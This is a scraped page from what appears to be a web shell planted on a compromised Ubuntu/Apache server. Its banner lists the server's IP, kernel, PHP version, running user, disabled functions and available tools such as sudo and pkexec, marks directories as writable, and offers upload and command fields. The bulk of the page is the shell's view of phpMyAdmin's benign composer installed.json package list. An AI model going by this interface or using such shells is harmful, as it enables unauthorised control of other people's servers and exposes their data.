403Webshell
Server IP : 13.213.54.232  /  Your IP : 216.73.216.72
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ip-172-31-17-110 6.8.0-1029-aws #31~22.04.1-Ubuntu SMP Thu Apr 24 21:16:18 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 7.1.33-67+ubuntu22.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/246939/cwd/html/phpmyadmin/vendor/composer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/246939/cwd/html/phpmyadmin/vendor/composer/installed.json
[
    {
        "name": "bacon/bacon-qr-code",
        "version": "1.0.3",
        "version_normalized": "1.0.3.0",
        "source": {
            "type": "git",
            "url": "https://github.com/Bacon/BaconQrCode.git",
            "reference": "5a91b62b9d37cee635bbf8d553f4546057250bee"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/Bacon/BaconQrCode/zipball/5a91b62b9d37cee635bbf8d553f4546057250bee",
            "reference": "5a91b62b9d37cee635bbf8d553f4546057250bee",
            "shasum": ""
        },
        "require": {
            "ext-iconv": "*",
            "php": "^5.4|^7.0"
        },
        "require-dev": {
            "phpunit/phpunit": "^4.8"
        },
        "suggest": {
            "ext-gd": "to generate QR code images"
        },
        "time": "2017-10-17T09:59:25+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "BaconQrCode": "src/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "BSD-2-Clause"
        ],
        "authors": [
            {
                "name": "Ben Scholzen 'DASPRiD'",
                "email": "mail@dasprids.de",
                "homepage": "http://www.dasprids.de",
                "role": "Developer"
            }
        ],
        "description": "BaconQrCode is a QR code generator for PHP.",
        "homepage": "https://github.com/Bacon/BaconQrCode"
    },
    {
        "name": "google/recaptcha",
        "version": "1.2.4",
        "version_normalized": "1.2.4.0",
        "source": {
            "type": "git",
            "url": "https://github.com/google/recaptcha.git",
            "reference": "614f25a9038be4f3f2da7cbfd778dc5b357d2419"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/google/recaptcha/zipball/614f25a9038be4f3f2da7cbfd778dc5b357d2419",
            "reference": "614f25a9038be4f3f2da7cbfd778dc5b357d2419",
            "shasum": ""
        },
        "require": {
            "php": ">=5.5"
        },
        "require-dev": {
            "friendsofphp/php-cs-fixer": "^2.2.20|^2.15",
            "php-coveralls/php-coveralls": "^2.1",
            "phpunit/phpunit": "^4.8.36|^5.7.27|^6.59|^7.5.11"
        },
        "time": "2020-03-31T17:50:54+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.2.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "ReCaptcha\\": "src/ReCaptcha"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "BSD-3-Clause"
        ],
        "description": "Client library for reCAPTCHA, a free service that protects websites from spam and abuse.",
        "homepage": "https://www.google.com/recaptcha/",
        "keywords": [
            "Abuse",
            "captcha",
            "recaptcha",
            "spam"
        ]
    },
    {
        "name": "paragonie/constant_time_encoding",
        "version": "v1.0.4",
        "version_normalized": "1.0.4.0",
        "source": {
            "type": "git",
            "url": "https://github.com/paragonie/constant_time_encoding.git",
            "reference": "2132f0f293d856026d7d11bd81b9f4a23a1dc1f6"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/paragonie/constant_time_encoding/zipball/2132f0f293d856026d7d11bd81b9f4a23a1dc1f6",
            "reference": "2132f0f293d856026d7d11bd81b9f4a23a1dc1f6",
            "shasum": ""
        },
        "require": {
            "php": "^5.3|^7"
        },
        "require-dev": {
            "paragonie/random_compat": "^1.4|^2",
            "phpunit/phpunit": "4.*|5.*",
            "vimeo/psalm": "^0.3|^1"
        },
        "time": "2018-04-30T17:57:16+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "ParagonIE\\ConstantTime\\": "src/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Paragon Initiative Enterprises",
                "email": "security@paragonie.com",
                "homepage": "https://paragonie.com",
                "role": "Maintainer"
            },
            {
                "name": "Steve 'Sc00bz' Thomas",
                "email": "steve@tobtu.com",
                "homepage": "https://www.tobtu.com",
                "role": "Original Developer"
            }
        ],
        "description": "Constant-time Implementations of RFC 4648 Encoding (Base-64, Base-32, Base-16)",
        "keywords": [
            "base16",
            "base32",
            "base32_decode",
            "base32_encode",
            "base64",
            "base64_decode",
            "base64_encode",
            "bin2hex",
            "encoding",
            "hex",
            "hex2bin",
            "rfc4648"
        ]
    },
    {
        "name": "paragonie/random_compat",
        "version": "v2.0.19",
        "version_normalized": "2.0.19.0",
        "source": {
            "type": "git",
            "url": "https://github.com/paragonie/random_compat.git",
            "reference": "446fc9faa5c2a9ddf65eb7121c0af7e857295241"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/paragonie/random_compat/zipball/446fc9faa5c2a9ddf65eb7121c0af7e857295241",
            "reference": "446fc9faa5c2a9ddf65eb7121c0af7e857295241",
            "shasum": ""
        },
        "require": {
            "php": ">=5.2.0"
        },
        "require-dev": {
            "phpunit/phpunit": "4.*|5.*"
        },
        "suggest": {
            "ext-libsodium": "Provides a modern crypto API that can be used to generate random bytes."
        },
        "time": "2020-10-15T10:06:57+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "files": [
                "lib/random.php"
            ]
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Paragon Initiative Enterprises",
                "email": "security@paragonie.com",
                "homepage": "https://paragonie.com"
            }
        ],
        "description": "PHP 5.x polyfill for random_bytes() and random_int() from PHP 7",
        "keywords": [
            "csprng",
            "polyfill",
            "pseudorandom",
            "random"
        ]
    },
    {
        "name": "phpmyadmin/motranslator",
        "version": "4.0",
        "version_normalized": "4.0.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/phpmyadmin/motranslator.git",
            "reference": "fcb370254998fda7eeccfd7c787b4deb71b0d77c"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/phpmyadmin/motranslator/zipball/fcb370254998fda7eeccfd7c787b4deb71b0d77c",
            "reference": "fcb370254998fda7eeccfd7c787b4deb71b0d77c",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.0",
            "symfony/expression-language": "^4.0 || ^3.2 || ^2.8"
        },
        "require-dev": {
            "apigen/apigen": "^4.1",
            "phpunit/php-code-coverage": "*",
            "phpunit/phpunit": "~4.8 || ~5.7 || ~6.5"
        },
        "time": "2018-02-12T13:22:52+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "PhpMyAdmin\\MoTranslator\\": "src"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "GPL-2.0-or-later"
        ],
        "authors": [
            {
                "name": "The phpMyAdmin Team",
                "email": "developers@phpmyadmin.net",
                "homepage": "https://www.phpmyadmin.net/team/"
            }
        ],
        "description": "Translation API for PHP using Gettext MO files",
        "homepage": "https://github.com/phpmyadmin/motranslator",
        "keywords": [
            "gettext",
            "i18n",
            "mo",
            "translator"
        ]
    },
    {
        "name": "phpmyadmin/shapefile",
        "version": "2.1",
        "version_normalized": "2.1.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/phpmyadmin/shapefile.git",
            "reference": "e23b767f2a81f61fee3fc09fc062879985f3e224"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/phpmyadmin/shapefile/zipball/e23b767f2a81f61fee3fc09fc062879985f3e224",
            "reference": "e23b767f2a81f61fee3fc09fc062879985f3e224",
            "shasum": ""
        },
        "require": {
            "php": ">=5.4.0"
        },
        "require-dev": {
            "phpunit/php-code-coverage": "*",
            "phpunit/phpunit": "~4.8 || ~5.7"
        },
        "suggest": {
            "ext-dbase": "For dbf files parsing"
        },
        "time": "2017-05-15T08:31:47+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "PhpMyAdmin\\ShapeFile\\": "src"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "GPL-2.0+"
        ],
        "authors": [
            {
                "name": "The phpMyAdmin Team",
                "email": "developers@phpmyadmin.net",
                "homepage": "https://www.phpmyadmin.net/team/"
            }
        ],
        "description": "ESRI ShapeFile library for PHP",
        "homepage": "https://github.com/phpmyadmin/shapefile",
        "keywords": [
            "ESRI",
            "Shapefile",
            "dbf",
            "geo",
            "geospatial",
            "shape",
            "shp"
        ]
    },
    {
        "name": "phpmyadmin/sql-parser",
        "version": "4.7.1",
        "version_normalized": "4.7.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/phpmyadmin/sql-parser.git",
            "reference": "550ce6968794e890cfd5b4cbf202e716d78b6a92"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/phpmyadmin/sql-parser/zipball/550ce6968794e890cfd5b4cbf202e716d78b6a92",
            "reference": "550ce6968794e890cfd5b4cbf202e716d78b6a92",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.0",
            "symfony/polyfill-mbstring": "^1.3"
        },
        "conflict": {
            "phpmyadmin/motranslator": "<3.0"
        },
        "require-dev": {
            "phpunit/phpunit": "~4.8 || ~5.7 || ~6.5 || ^7.0",
            "squizlabs/php_codesniffer": "~2.9 || ~3.4"
        },
        "suggest": {
            "ext-mbstring": "For best performance",
            "phpmyadmin/motranslator": "Translate messages to your favorite locale"
        },
        "time": "2020-10-15T15:17:59+00:00",
        "bin": [
            "bin/highlight-query",
            "bin/lint-query",
            "bin/tokenize-query"
        ],
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "PhpMyAdmin\\SqlParser\\": "src"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "GPL-2.0-or-later"
        ],
        "authors": [
            {
                "name": "The phpMyAdmin Team",
                "email": "developers@phpmyadmin.net",
                "homepage": "https://www.phpmyadmin.net/team/"
            }
        ],
        "description": "A validating SQL lexer and parser with a focus on MySQL dialect.",
        "homepage": "https://github.com/phpmyadmin/sql-parser",
        "keywords": [
            "analysis",
            "lexer",
            "parser",
            "sql"
        ]
    },
    {
        "name": "phpseclib/phpseclib",
        "version": "2.0.29",
        "version_normalized": "2.0.29.0",
        "source": {
            "type": "git",
            "url": "https://github.com/phpseclib/phpseclib.git",
            "reference": "497856a8d997f640b4a516062f84228a772a48a8"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/phpseclib/phpseclib/zipball/497856a8d997f640b4a516062f84228a772a48a8",
            "reference": "497856a8d997f640b4a516062f84228a772a48a8",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.3"
        },
        "require-dev": {
            "phing/phing": "~2.7",
            "phpunit/phpunit": "^4.8.35|^5.7|^6.0",
            "squizlabs/php_codesniffer": "~2.0"
        },
        "suggest": {
            "ext-gmp": "Install the GMP (GNU Multiple Precision) extension in order to speed up arbitrary precision integer arithmetic operations.",
            "ext-libsodium": "SSH2/SFTP can make use of some algorithms provided by the libsodium-php extension.",
            "ext-mcrypt": "Install the Mcrypt extension in order to speed up a few other cryptographic operations.",
            "ext-openssl": "Install the OpenSSL extension in order to speed up a wide variety of cryptographic operations."
        },
        "time": "2020-09-08T04:24:43+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "files": [
                "phpseclib/bootstrap.php"
            ],
            "psr-4": {
                "phpseclib\\": "phpseclib/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Jim Wigginton",
                "email": "terrafrost@php.net",
                "role": "Lead Developer"
            },
            {
                "name": "Patrick Monnerat",
                "email": "pm@datasphere.ch",
                "role": "Developer"
            },
            {
                "name": "Andreas Fischer",
                "email": "bantu@phpbb.com",
                "role": "Developer"
            },
            {
                "name": "Hans-Jürgen Petrich",
                "email": "petrich@tronic-media.com",
                "role": "Developer"
            },
            {
                "name": "Graham Campbell",
                "email": "graham@alt-three.com",
                "role": "Developer"
            }
        ],
        "description": "PHP Secure Communications Library - Pure-PHP implementations of RSA, AES, SSH2, SFTP, X.509 etc.",
        "homepage": "http://phpseclib.sourceforge.net",
        "keywords": [
            "BigInteger",
            "aes",
            "asn.1",
            "asn1",
            "blowfish",
            "crypto",
            "cryptography",
            "encryption",
            "rsa",
            "security",
            "sftp",
            "signature",
            "signing",
            "ssh",
            "twofish",
            "x.509",
            "x509"
        ],
        "funding": [
            {
                "url": "https://github.com/terrafrost",
                "type": "github"
            },
            {
                "url": "https://www.patreon.com/phpseclib",
                "type": "patreon"
            },
            {
                "url": "https://tidelift.com/funding/github/packagist/phpseclib/phpseclib",
                "type": "tidelift"
            }
        ]
    },
    {
        "name": "pragmarx/google2fa",
        "version": "v3.0.3",
        "version_normalized": "3.0.3.0",
        "source": {
            "type": "git",
            "url": "https://github.com/antonioribeiro/google2fa.git",
            "reference": "6949226739e4424f40031e6f1c96b1fd64047335"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/antonioribeiro/google2fa/zipball/6949226739e4424f40031e6f1c96b1fd64047335",
            "reference": "6949226739e4424f40031e6f1c96b1fd64047335",
            "shasum": ""
        },
        "require": {
            "paragonie/constant_time_encoding": "~1.0|~2.0",
            "paragonie/random_compat": ">=1",
            "php": ">=5.4",
            "symfony/polyfill-php56": "~1.2"
        },
        "require-dev": {
            "bacon/bacon-qr-code": "~1.0",
            "phpunit/phpunit": "~4|~5|~6"
        },
        "suggest": {
            "bacon/bacon-qr-code": "Required to generate inline QR Codes."
        },
        "time": "2018-08-29T13:28:06+00:00",
        "type": "library",
        "extra": {
            "component": "package",
            "branch-alias": {
                "dev-master": "2.0-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "PragmaRX\\Google2FA\\": "src/",
                "PragmaRX\\Google2FA\\Tests\\": "tests/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Antonio Carlos Ribeiro",
                "email": "acr@antoniocarlosribeiro.com",
                "role": "Creator & Designer"
            }
        ],
        "description": "A One Time Password Authentication package, compatible with Google Authenticator.",
        "keywords": [
            "2fa",
            "Authentication",
            "Two Factor Authentication",
            "google2fa",
            "laravel"
        ]
    },
    {
        "name": "psr/container",
        "version": "1.0.0",
        "version_normalized": "1.0.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/php-fig/container.git",
            "reference": "b7ce3b176482dbbc1245ebf52b181af44c2cf55f"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/php-fig/container/zipball/b7ce3b176482dbbc1245ebf52b181af44c2cf55f",
            "reference": "b7ce3b176482dbbc1245ebf52b181af44c2cf55f",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.0"
        },
        "time": "2017-02-14T16:28:37+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.0.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Psr\\Container\\": "src/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "PHP-FIG",
                "homepage": "http://www.php-fig.org/"
            }
        ],
        "description": "Common Container Interface (PHP FIG PSR-11)",
        "homepage": "https://github.com/php-fig/container",
        "keywords": [
            "PSR-11",
            "container",
            "container-interface",
            "container-interop",
            "psr"
        ]
    },
    {
        "name": "samyoul/u2f-php-server",
        "version": "v1.1.4",
        "version_normalized": "1.1.4.0",
        "source": {
            "type": "git",
            "url": "https://github.com/Samyoul/U2F-php-server.git",
            "reference": "0625202c79d570e58525ed6c4ae38500ea3f0883"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/Samyoul/U2F-php-server/zipball/0625202c79d570e58525ed6c4ae38500ea3f0883",
            "reference": "0625202c79d570e58525ed6c4ae38500ea3f0883",
            "shasum": ""
        },
        "require": {
            "ext-openssl": "*"
        },
        "time": "2018-10-26T12:43:39+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Samyoul\\U2F\\U2FServer\\": [
                    "src/"
                ]
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "BSD-2-Clause"
        ],
        "authors": [
            {
                "name": "Samuel Hawksby-Robinson",
                "email": "samuel@samyoul.com"
            }
        ],
        "description": "Server side handling class for FIDO U2F registration and authentication"
    },
    {
        "name": "symfony/expression-language",
        "version": "v2.8.52",
        "version_normalized": "2.8.52.0",
        "source": {
            "type": "git",
            "url": "https://github.com/symfony/expression-language.git",
            "reference": "fa9be1b831859b56d244137fabbfd01a46dbdb36"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/symfony/expression-language/zipball/fa9be1b831859b56d244137fabbfd01a46dbdb36",
            "reference": "fa9be1b831859b56d244137fabbfd01a46dbdb36",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.9"
        },
        "time": "2018-11-11T11:18:13+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "2.8-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Symfony\\Component\\ExpressionLanguage\\": ""
            },
            "exclude-from-classmap": [
                "/Tests/"
            ]
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Fabien Potencier",
                "email": "fabien@symfony.com"
            },
            {
                "name": "Symfony Community",
                "homepage": "https://symfony.com/contributors"
            }
        ],
        "description": "Symfony ExpressionLanguage Component",
        "homepage": "https://symfony.com"
    },
    {
        "name": "symfony/polyfill-ctype",
        "version": "v1.18.1",
        "version_normalized": "1.18.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/symfony/polyfill-ctype.git",
            "reference": "1c302646f6efc070cd46856e600e5e0684d6b454"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/symfony/polyfill-ctype/zipball/1c302646f6efc070cd46856e600e5e0684d6b454",
            "reference": "1c302646f6efc070cd46856e600e5e0684d6b454",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.3"
        },
        "suggest": {
            "ext-ctype": "For best performance"
        },
        "time": "2020-07-14T12:35:20+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.18-dev"
            },
            "thanks": {
                "name": "symfony/polyfill",
                "url": "https://github.com/symfony/polyfill"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Symfony\\Polyfill\\Ctype\\": ""
            },
            "files": [
                "bootstrap.php"
            ]
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Gert de Pagter",
                "email": "BackEndTea@gmail.com"
            },
            {
                "name": "Symfony Community",
                "homepage": "https://symfony.com/contributors"
            }
        ],
        "description": "Symfony polyfill for ctype functions",
        "homepage": "https://symfony.com",
        "keywords": [
            "compatibility",
            "ctype",
            "polyfill",
            "portable"
        ],
        "funding": [
            {
                "url": "https://symfony.com/sponsor",
                "type": "custom"
            },
            {
                "url": "https://github.com/fabpot",
                "type": "github"
            },
            {
                "url": "https://tidelift.com/funding/github/packagist/symfony/symfony",
                "type": "tidelift"
            }
        ]
    },
    {
        "name": "symfony/polyfill-mbstring",
        "version": "v1.18.1",
        "version_normalized": "1.18.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/symfony/polyfill-mbstring.git",
            "reference": "a6977d63bf9a0ad4c65cd352709e230876f9904a"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/symfony/polyfill-mbstring/zipball/a6977d63bf9a0ad4c65cd352709e230876f9904a",
            "reference": "a6977d63bf9a0ad4c65cd352709e230876f9904a",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.3"
        },
        "suggest": {
            "ext-mbstring": "For best performance"
        },
        "time": "2020-07-14T12:35:20+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.18-dev"
            },
            "thanks": {
                "name": "symfony/polyfill",
                "url": "https://github.com/symfony/polyfill"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Symfony\\Polyfill\\Mbstring\\": ""
            },
            "files": [
                "bootstrap.php"
            ]
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Nicolas Grekas",
                "email": "p@tchwork.com"
            },
            {
                "name": "Symfony Community",
                "homepage": "https://symfony.com/contributors"
            }
        ],
        "description": "Symfony polyfill for the Mbstring extension",
        "homepage": "https://symfony.com",
        "keywords": [
            "compatibility",
            "mbstring",
            "polyfill",
            "portable",
            "shim"
        ],
        "funding": [
            {
                "url": "https://symfony.com/sponsor",
                "type": "custom"
            },
            {
                "url": "https://github.com/fabpot",
                "type": "github"
            },
            {
                "url": "https://tidelift.com/funding/github/packagist/symfony/symfony",
                "type": "tidelift"
            }
        ]
    },
    {
        "name": "symfony/polyfill-php56",
        "version": "v1.18.1",
        "version_normalized": "1.18.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/symfony/polyfill-php56.git",
            "reference": "13df84e91cd168f247c2f2ec82cc0fa24901c011"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/symfony/polyfill-php56/zipball/13df84e91cd168f247c2f2ec82cc0fa24901c011",
            "reference": "13df84e91cd168f247c2f2ec82cc0fa24901c011",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.3",
            "symfony/polyfill-util": "~1.0"
        },
        "time": "2020-07-14T12:35:20+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.18-dev"
            },
            "thanks": {
                "name": "symfony/polyfill",
                "url": "https://github.com/symfony/polyfill"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Symfony\\Polyfill\\Php56\\": ""
            },
            "files": [
                "bootstrap.php"
            ]
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Nicolas Grekas",
                "email": "p@tchwork.com"
            },
            {
                "name": "Symfony Community",
                "homepage": "https://symfony.com/contributors"
            }
        ],
        "description": "Symfony polyfill backporting some PHP 5.6+ features to lower PHP versions",
        "homepage": "https://symfony.com",
        "keywords": [
            "compatibility",
            "polyfill",
            "portable",
            "shim"
        ],
        "funding": [
            {
                "url": "https://symfony.com/sponsor",
                "type": "custom"
            },
            {
                "url": "https://github.com/fabpot",
                "type": "github"
            },
            {
                "url": "https://tidelift.com/funding/github/packagist/symfony/symfony",
                "type": "tidelift"
            }
        ]
    },
    {
        "name": "symfony/polyfill-util",
        "version": "v1.18.1",
        "version_normalized": "1.18.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/symfony/polyfill-util.git",
            "reference": "46b910c71e9828f8ec2aa7a0314de1130d9b295a"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/symfony/polyfill-util/zipball/46b910c71e9828f8ec2aa7a0314de1130d9b295a",
            "reference": "46b910c71e9828f8ec2aa7a0314de1130d9b295a",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.3"
        },
        "time": "2020-07-14T12:35:20+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.18-dev"
            },
            "thanks": {
                "name": "symfony/polyfill",
                "url": "https://github.com/symfony/polyfill"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Symfony\\Polyfill\\Util\\": ""
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Nicolas Grekas",
                "email": "p@tchwork.com"
            },
            {
                "name": "Symfony Community",
                "homepage": "https://symfony.com/contributors"
            }
        ],
        "description": "Symfony utilities for portability of PHP codes",
        "homepage": "https://symfony.com",
        "keywords": [
            "compat",
            "compatibility",
            "polyfill",
            "shim"
        ],
        "funding": [
            {
                "url": "https://symfony.com/sponsor",
                "type": "custom"
            },
            {
                "url": "https://github.com/fabpot",
                "type": "github"
            },
            {
                "url": "https://tidelift.com/funding/github/packagist/symfony/symfony",
                "type": "tidelift"
            }
        ]
    },
    {
        "name": "tecnickcom/tcpdf",
        "version": "6.3.5",
        "version_normalized": "6.3.5.0",
        "source": {
            "type": "git",
            "url": "https://github.com/tecnickcom/TCPDF.git",
            "reference": "19a535eaa7fb1c1cac499109deeb1a7a201b4549"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/tecnickcom/TCPDF/zipball/19a535eaa7fb1c1cac499109deeb1a7a201b4549",
            "reference": "19a535eaa7fb1c1cac499109deeb1a7a201b4549",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.0"
        },
        "time": "2020-02-14T14:20:12+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "classmap": [
                "config",
                "include",
                "tcpdf.php",
                "tcpdf_parser.php",
                "tcpdf_import.php",
                "tcpdf_barcodes_1d.php",
                "tcpdf_barcodes_2d.php",
                "include/tcpdf_colors.php",
                "include/tcpdf_filters.php",
                "include/tcpdf_font_data.php",
                "include/tcpdf_fonts.php",
                "include/tcpdf_images.php",
                "include/tcpdf_static.php",
                "include/barcodes/datamatrix.php",
                "include/barcodes/pdf417.php",
                "include/barcodes/qrcode.php"
            ]
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "LGPL-3.0-only"
        ],
        "authors": [
            {
                "name": "Nicola Asuni",
                "email": "info@tecnick.com",
                "role": "lead"
            }
        ],
        "description": "TCPDF is a PHP class for generating PDF documents and barcodes.",
        "homepage": "http://www.tcpdf.org/",
        "keywords": [
            "PDFD32000-2008",
            "TCPDF",
            "barcodes",
            "datamatrix",
            "pdf",
            "pdf417",
            "qrcode"
        ]
    },
    {
        "name": "twig/extensions",
        "version": "v1.5.4",
        "version_normalized": "1.5.4.0",
        "source": {
            "type": "git",
            "url": "https://github.com/twigphp/Twig-extensions.git",
            "reference": "57873c8b0c1be51caa47df2cdb824490beb16202"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/twigphp/Twig-extensions/zipball/57873c8b0c1be51caa47df2cdb824490beb16202",
            "reference": "57873c8b0c1be51caa47df2cdb824490beb16202",
            "shasum": ""
        },
        "require": {
            "twig/twig": "^1.27|^2.0"
        },
        "require-dev": {
            "symfony/phpunit-bridge": "^3.4",
            "symfony/translation": "^2.7|^3.4"
        },
        "suggest": {
            "symfony/translation": "Allow the time_diff output to be translated"
        },
        "time": "2018-12-05T18:34:18+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.5-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "Twig_Extensions_": "lib/"
            },
            "psr-4": {
                "Twig\\Extensions\\": "src/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Fabien Potencier",
                "email": "fabien@symfony.com"
            }
        ],
        "description": "Common additional features for Twig that do not directly belong in core",
        "keywords": [
            "i18n",
            "text"
        ],
        "abandoned": true
    },
    {
        "name": "twig/twig",
        "version": "v1.42.5",
        "version_normalized": "1.42.5.0",
        "source": {
            "type": "git",
            "url": "https://github.com/twigphp/Twig.git",
            "reference": "87b2ea9d8f6fd014d0621ca089bb1b3769ea3f8e"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/twigphp/Twig/zipball/87b2ea9d8f6fd014d0621ca089bb1b3769ea3f8e",
            "reference": "87b2ea9d8f6fd014d0621ca089bb1b3769ea3f8e",
            "shasum": ""
        },
        "require": {
            "php": ">=5.5.0",
            "symfony/polyfill-ctype": "^1.8"
        },
        "require-dev": {
            "psr/container": "^1.0",
            "symfony/phpunit-bridge": "^4.4|^5.0"
        },
        "time": "2020-02-11T05:59:23+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.42-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "Twig_": "lib/"
            },
            "psr-4": {
                "Twig\\": "src/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "BSD-3-Clause"
        ],
        "authors": [
            {
                "name": "Fabien Potencier",
                "email": "fabien@symfony.com",
                "homepage": "http://fabien.potencier.org",
                "role": "Lead Developer"
            },
            {
                "name": "Twig Team",
                "role": "Contributors"
            },
            {
                "name": "Armin Ronacher",
                "email": "armin.ronacher@active-4.com",
                "role": "Project Founder"
            }
        ],
        "description": "Twig, the flexible, fast, and secure template language for PHP",
        "homepage": "https://twig.symfony.com",
        "keywords": [
            "templating"
        ]
    }
]

Youez - 2016 - github.com/yon3zu
LinuXploit